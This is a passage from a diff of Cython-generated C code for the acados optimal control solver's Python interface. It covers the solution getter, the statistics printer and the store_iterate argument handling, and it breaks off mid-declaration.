__Pyx_GIVEREF(__pyx_n_u_pi); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_pi); + __Pyx_INCREF(__pyx_n_u_lam); + __Pyx_GIVEREF(__pyx_n_u_lam); + PyList_SET_ITEM(__pyx_t_1, 4, __pyx_n_u_lam); + __Pyx_INCREF(__pyx_n_u_t); + __Pyx_GIVEREF(__pyx_n_u_t); + PyList_SET_ITEM(__pyx_t_1, 5, __pyx_n_u_t); + __Pyx_INCREF(__pyx_n_u_sl); + __Pyx_GIVEREF(__pyx_n_u_sl); + PyList_SET_ITEM(__pyx_t_1, 6, __pyx_n_u_sl); + __Pyx_INCREF(__pyx_n_u_su); + __Pyx_GIVEREF(__pyx_n_u_su); + PyList_SET_ITEM(__pyx_t_1, 7, __pyx_n_u_su); + __pyx_v_out_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":252 + * + * out_fields = ['x', 'u', 'z', 'pi', 'lam', 't', 'sl', 'su'] + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * if field_ not in out_fields: + */ + if (unlikely(__pyx_v_field_ == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 252, __pyx_L1_error) + } + __pyx_t_1 = PyUnicode_AsUTF8String(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 252, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_field = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":254 + * field = field_.encode('utf-8') + * + * if field_ not in out_fields: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.get(): {} is an invalid argument.\ + * \n Possible values are {}. Exiting.'.format(field_, out_fields)) + */ + __pyx_t_2 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_out_fields, Py_NE)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 254, __pyx_L1_error) + if (unlikely(__pyx_t_2)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":256 + * if field_ not in out_fields: + * raise Exception('AcadosOcpSolverCython.get(): {} is an invalid argument.\ + * \n Possible values are {}. Exiting.'.format(field_, out_fields)) # <<<<<<<<<<<<<< + * + * if stage < 0 or stage > self.N: + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_AcadosOcpSolverCython_get_is_an, __pyx_n_s_format); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 256, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_4, __pyx_v_field_, __pyx_v_out_fields}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 2+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 256, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":255 + * + * if field_ not in out_fields: + * raise Exception('AcadosOcpSolverCython.get(): {} is an invalid argument.\ # <<<<<<<<<<<<<< + * \n Possible values are {}. Exiting.'.format(field_, out_fields)) + * + */ + __pyx_t_3 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 255, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_t_3, 0, 0, 0); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __PYX_ERR(0, 255, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":254 + * field = field_.encode('utf-8') + * + * if field_ not in out_fields: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.get(): {} is an invalid argument.\ + * \n Possible values are {}. Exiting.'.format(field_, out_fields)) + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":258 + * \n Possible values are {}. Exiting.'.format(field_, out_fields)) + * + * if stage < 0 or stage > self.N: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.get(): stage index must be in [0, N], got: {}.'.format(self.N)) + * + */ + __pyx_t_6 = (__pyx_v_stage < 0); + if (!__pyx_t_6) { + } else { + __pyx_t_2 = __pyx_t_6; + goto __pyx_L5_bool_binop_done; + } + __pyx_t_6 = (__pyx_v_stage > __pyx_v_self->N); + __pyx_t_2 = __pyx_t_6; + __pyx_L5_bool_binop_done:; + if (unlikely(__pyx_t_2)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":259 + * + * if stage < 0 or stage > self.N: + * raise Exception('AcadosOcpSolverCython.get(): stage index must be in [0, N], got: {}.'.format(self.N)) # <<<<<<<<<<<<<< + * + * if stage == self.N and field_ == 'pi': + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_AcadosOcpSolverCython_get_stage, __pyx_n_s_format); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 259, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = __Pyx_PyInt_From_int(__pyx_v_self->N); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 259, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_7 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_7, __pyx_t_4}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 259, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 259, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 259, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":258 + * \n Possible values are {}. Exiting.'.format(field_, out_fields)) + * + * if stage < 0 or stage > self.N: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.get(): stage index must be in [0, N], got: {}.'.format(self.N)) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":261 + * raise Exception('AcadosOcpSolverCython.get(): stage index must be in [0, N], got: {}.'.format(self.N)) + * + * if stage == self.N and field_ == 'pi': # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.get(): field {} does not exist at final stage {}.'\ + * .format(field_, stage)) + */ + __pyx_t_6 = (__pyx_v_stage == __pyx_v_self->N); + if (__pyx_t_6) { + } else { + __pyx_t_2 = __pyx_t_6; + goto __pyx_L8_bool_binop_done; + } + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_pi, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 261, __pyx_L1_error) + __pyx_t_2 = __pyx_t_6; + __pyx_L8_bool_binop_done:; + if (unlikely(__pyx_t_2)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":263 + * if stage == self.N and field_ == 'pi': + * raise Exception('AcadosOcpSolverCython.get(): field {} does not exist at final stage {}.'\ + * .format(field_, stage)) # <<<<<<<<<<<<<< + * + * cdef int dims = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_AcadosOcpSolverCython_get_field, __pyx_n_s_format); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 263, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_PyInt_From_int(__pyx_v_stage); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 263, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_7 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_7, __pyx_v_field_, __pyx_t_4}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 2+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 263, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":262 + * + * if stage == self.N and field_ == 'pi': + * raise Exception('AcadosOcpSolverCython.get(): field {} does not exist at final stage {}.'\ # <<<<<<<<<<<<<< + * .format(field_, stage)) + * + */ + __pyx_t_3 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 262, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_t_3, 0, 0, 0); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __PYX_ERR(0, 262, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":261 + * raise Exception('AcadosOcpSolverCython.get(): stage index must be in [0, N], got: {}.'.format(self.N)) + * + * if stage == self.N and field_ == 'pi': # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.get(): field {} does not exist at final stage {}.'\ + * .format(field_, stage)) + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":266 + * + * cdef int dims = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field) # <<<<<<<<<<<<<< + * + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((dims,)) + */ + __pyx_t_8 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_8) && PyErr_Occurred())) __PYX_ERR(0, 266, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":265 + * .format(field_, stage)) + * + * cdef int dims = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_out, stage, field) + * + */ + __pyx_v_dims = ocp_nlp_dims_get_from_attr(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_8); + + /* "acados_template/acados_ocp_solver_pyx.pyx":268 + * self.nlp_dims, self.nlp_out, stage, field) + * + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((dims,)) # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_out_get(self.nlp_config, \ + * self.nlp_dims, self.nlp_out, stage, field, out.data) + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 268, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_zeros); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 268, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_dims); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 268, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_7 = PyTuple_New(1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 268, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_7, 0, __pyx_t_1); + __pyx_t_1 = 0; + __pyx_t_1 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_t_7}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 268, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + if (!(likely(((__pyx_t_3) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_3, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 268, __pyx_L1_error) + __pyx_t_9 = ((PyArrayObject *)__pyx_t_3); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_out.rcbuffer->pybuffer, (PyObject*)__pyx_t_9, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 1, 0, __pyx_stack) == -1)) { + __pyx_v_out = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_out.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 268, __pyx_L1_error) + } else {__pyx_pybuffernd_out.diminfo[0].strides = __pyx_pybuffernd_out.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_out.diminfo[0].shape = __pyx_pybuffernd_out.rcbuffer->pybuffer.shape[0]; + } + } + __pyx_t_9 = 0; + __pyx_v_out = ((PyArrayObject *)__pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":270 + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((dims,)) + * acados_solver_common.ocp_nlp_out_get(self.nlp_config, \ + * self.nlp_dims, self.nlp_out, stage, field, out.data) # <<<<<<<<<<<<<< + * + * return out + */ + __pyx_t_10 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_10) && PyErr_Occurred())) __PYX_ERR(0, 270, __pyx_L1_error) + __pyx_t_11 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_out)); if (unlikely(__pyx_t_11 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 270, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":269 + * + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((dims,)) + * acados_solver_common.ocp_nlp_out_get(self.nlp_config, \ # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_out, stage, field, out.data) + * + */ + ocp_nlp_out_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_10, ((void *)__pyx_t_11)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":272 + * self.nlp_dims, self.nlp_out, stage, field, out.data) + * + * return out # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_out); + __pyx_r = ((PyObject *)__pyx_v_out); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":232 + * + * + * def get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get the last solution of the solver: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_7); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF(__pyx_v_out_fields); + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XDECREF((PyObject *)__pyx_v_out); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":275 + * + * + * def print_statistics(self): # <<<<<<<<<<<<<< + * """ + * prints statistics of previous solver run as a table: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_17print_statistics(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_16print_statistics, "\n prints statistics of previous solver run as a table:\n - iter: iteration number\n - res_stat: stationarity residual\n - res_eq: residual wrt equality constraints (dynamics)\n - res_ineq: residual wrt inequality constraints (constraints)\n - res_comp: residual wrt complementarity conditions\n - qp_stat: status of QP solver\n - qp_iter: number of QP iterations\n - qp_res_stat: stationarity residual of the last QP solution\n - qp_res_eq: residual wrt equality constraints (dynamics) of the last QP solution\n - qp_res_ineq: residual wrt inequality constraints (constraints) of the last QP solution\n - qp_res_comp: residual wrt complementarity conditions of the last QP solution\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_17print_statistics = {"print_statistics", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_17print_statistics, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_16print_statistics}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_17print_statistics(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("print_statistics (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("print_statistics", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "print_statistics", 0))) return NULL; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_16print_statistics(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_16print_statistics(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("print_statistics", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":290 + * - qp_res_comp: residual wrt complementarity conditions of the last QP solution + * """ + * acados_solver.acados_print_stats(self.capsule) # <<<<<<<<<<<<<< + * + * + */ + long_acados_print_stats(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":275 + * + * + * def print_statistics(self): # <<<<<<<<<<<<<< + * """ + * prints statistics of previous solver run as a table: + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":293 + * + * + * def store_iterate(self, filename='', overwrite=False): # <<<<<<<<<<<<<< + * """ + * Stores the current iterate of the ocp solver in a json file. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_19store_iterate(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_18store_iterate, "\n Stores the current iterate of the ocp solver in a json file.\n\n :param filename: if not set, use model_name + timestamp + '.json'\n :param overwrite: if false and filename exists add timestamp to filename\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_19store_iterate = {"store_iterate", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_19store_iterate, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_18store_iterate}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_19store_iterate(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_filename = 0; + PyObject *__pyx_v_overwrite = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("store_iterate (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_filename,&__pyx_n_s_overwrite,0}; + PyObject* values[2] = {0,0}; + values[0] = ((PyObject *)__pyx_kp_u__14); + values[1] = ((PyObject *)Py_False); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_filename); + if (value) { values[0] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 293, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 1: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_overwrite); + if (value) { values[1] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 293, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "store_iterate") < 0)) __PYX_ERR(0, 293, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_filename = values[0]; + __pyx_v_overwrite = values[1]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("store_iterate", 0, 0, 2, __pyx_nargs); __PYX_ERR(0, 293, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.store_iterate", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_18store_iterate(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_filename, __pyx_v_overwrite); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":326 + * # save + * with open(filename, 'w') as f: + * json.dump(solution, f, default=lambda x: x.tolist(), indent=4, sort_keys=True) # <<<<<<<<<<<<<< + * print("stored current iterate in ", os.path.join(os.getcwd(), filename)) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13store_iterate_lambda(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13store_iterate_lambda = {"lambda", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13store_iterate_lambda, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13store_iterate_lambda(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_x = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char 